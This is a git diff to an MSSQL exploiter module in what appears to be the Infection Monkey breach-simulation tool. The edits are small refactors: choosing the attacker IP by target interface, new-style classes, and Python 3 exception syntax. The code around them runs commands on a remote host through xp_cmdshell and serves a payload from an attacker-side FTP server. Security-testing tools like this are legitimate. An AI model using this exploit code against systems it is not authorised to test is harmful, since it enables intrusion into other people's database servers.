diff --git a/infection_monkey/exploit/mssqlexec.py b/infection_monkey/exploit/mssqlexec.py index 0fae16fe4..6f920a073 100644 --- a/infection_monkey/exploit/mssqlexec.py +++ b/infection_monkey/exploit/mssqlexec.py @@ -51,7 +51,7 @@ class MSSQLExploiter(HostExploiter): True or False depends on process success """ - chosen_attack = self.attacks_list[0](payload, cursor) + chosen_attack = self.attacks_list[0](payload, cursor, self.host.ip_addr) if chosen_attack.send_payload(): LOG.debug('Payload: {0} has been successfully sent to host'.format(payload)) diff --git a/infection_monkey/exploit/mssqlexec_utils.py b/infection_monkey/exploit/mssqlexec_utils.py index 13509f0f0..c3666a340 100644 --- a/infection_monkey/exploit/mssqlexec_utils.py +++ b/infection_monkey/exploit/mssqlexec_utils.py @@ -5,6 +5,7 @@ import socket import pymssql +from exploit.tools import get_interface_to_target from pyftpdlib.authorizers import DummyAuthorizer from pyftpdlib.handlers import FTPHandler from pyftpdlib.servers import FTPServer @@ -22,7 +23,7 @@ FTP_WORKING_DIR = '.' LOG = logging.getLogger(__name__) -class FTP: +class FTP(object): """Configures and establish an FTP server with default details. @@ -103,11 +104,11 @@ class CmdShellAttack(AttackHost): """ - def __init__(self, payload_path, cursor): + def __init__(self, payload_path, cursor, dst_ip_address): super(CmdShellAttack, self).__init__(payload_path) self.ftp_server, self.ftp_server_p = self.__init_ftp_server() self.cursor = cursor - self.attacker_ip = self.__find_own_ip() + self.attacker_ip = get_interface_to_target(dst_ip_address) def send_payload(self): """ @@ -134,7 +135,7 @@ class CmdShellAttack(AttackHost): # Running the cmd on remote host for cmd in shellcmds: self.cursor.execute(cmd) - except Exception, e: + except Exception as e: LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True) self.ftp_server_p.terminate() return False @@ -195,7 +196,7 @@ class CmdShellAttack(AttackHost): p.start() LOG.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name)) return ftp_s, p - except Exception, e: + except Exception as e: LOG.error('Exception raised while trying to pull up the ftp server', exc_info=True) return None, None